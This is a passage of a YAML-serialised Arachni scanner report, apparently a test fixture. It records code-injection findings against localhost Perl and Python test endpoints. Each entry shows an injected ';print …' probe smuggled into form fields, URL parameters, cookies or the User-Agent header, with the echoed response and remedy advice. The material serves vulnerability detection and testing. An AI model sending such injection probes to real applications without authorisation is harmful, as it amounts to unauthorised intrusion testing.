http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/perl/form/append elem: form method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;print 287630581954+4196403186331128; :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default;print 287630581954+4196403186331128; :follow_location: true :injected: default;print 287630581954+4196403186331128; :combo: !binary "aW5wdXQ=": default;print 287630581954+4196403186331128; :action: http://localhost:6875/perl/form/append :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/perl/form/append injected: default;print 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/perl/link/append?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;print 287630581954+4196403186331128; :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default;print 287630581954+4196403186331128; :follow_location: true :injected: default;print 287630581954+4196403186331128; :combo: !binary "aW5wdXQ=": default;print 287630581954+4196403186331128; :action: http://localhost:6875/perl/link/append?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/perl/link/append?input=default injected: default;print 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/perl/link/straight?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;print 287630581954+4196403186331128; :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ;print 287630581954+4196403186331128; :follow_location: true :injected: ;print 287630581954+4196403186331128; :combo: !binary "aW5wdXQ=": ;print 287630581954+4196403186331128; :action: http://localhost:6875/perl/link/straight?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/perl/link/straight?input=default injected: ;print 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie2 url: http://localhost:6875/perl/cookie/append elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;print 287630581954+4196403186331128; :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value;print 287630581954+4196403186331128; :injected: cookie value;print 287630581954+4196403186331128; :combo: !binary "Y29va2llMg==": cookie value;print 287630581954+4196403186331128; :action: http://localhost:6875/perl/cookie/append :verification: false :id: '4196690816913082' var: cookie2 url: http://localhost:6875/perl/cookie/append injected: cookie value;print 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value%3Bprint+287630581954%2B4196403186331128%3B;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjozMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:6875/perl/cookie/straight elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;print 287630581954+4196403186331128; :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ;print 287630581954+4196403186331128; :injected: ;print 287630581954+4196403186331128; :combo: !binary "Y29va2ll": ;print 287630581954+4196403186331128; :action: http://localhost:6875/perl/cookie/straight :verification: false :id: '4196690816913082' var: cookie url: http://localhost:6875/perl/cookie/straight injected: ;print 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=%3Bprint+287630581954%2B4196403186331128%3B response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjozMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/perl/header/append elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ! '";print 287630581954+4196403186331128;#' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user";print 287630581954+4196403186331128;# :injected: arachni_user";print 287630581954+4196403186331128;# :combo: User-Agent: arachni_user";print 287630581954+4196403186331128;# :action: http://localhost:6875/perl/header/append :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/perl/header/append injected: arachni_user";print 287630581954+4196403186331128;# id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: {} method: GET response: ! 
'[4196690816913082, 4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user";print 287630581954+4196403186331128;# Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo0MiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/perl/header/straight elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;print 287630581954+4196403186331128; :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ;print 287630581954+4196403186331128; :injected: ;print 287630581954+4196403186331128; :combo: User-Agent: ;print 287630581954+4196403186331128; :action: http://localhost:6875/perl/header/straight :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/perl/header/straight injected: ;print 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ;print 287630581954+4196403186331128; Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo0OCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/python/form/straight elem: form method: POST name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;print 287630581954+4196403186331128 :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ;print 287630581954+4196403186331128 :follow_location: true :injected: ;print 287630581954+4196403186331128 :combo: !binary "aW5wdXQ=": ;print 287630581954+4196403186331128 :action: http://localhost:6875/python/form/straight :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/python/form/straight injected: ;print 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: :stuff: - Blah - Blah2 method: POST response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo0OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/python/form/append elem: form method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;print 287630581954+4196403186331128 :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default;print 287630581954+4196403186331128 :follow_location: true :injected: default;print 287630581954+4196403186331128 :combo: !binary "aW5wdXQ=": default;print 287630581954+4196403186331128 :action: http://localhost:6875/python/form/append :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/python/form/append injected: default;print 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo0OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/python/link/append?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
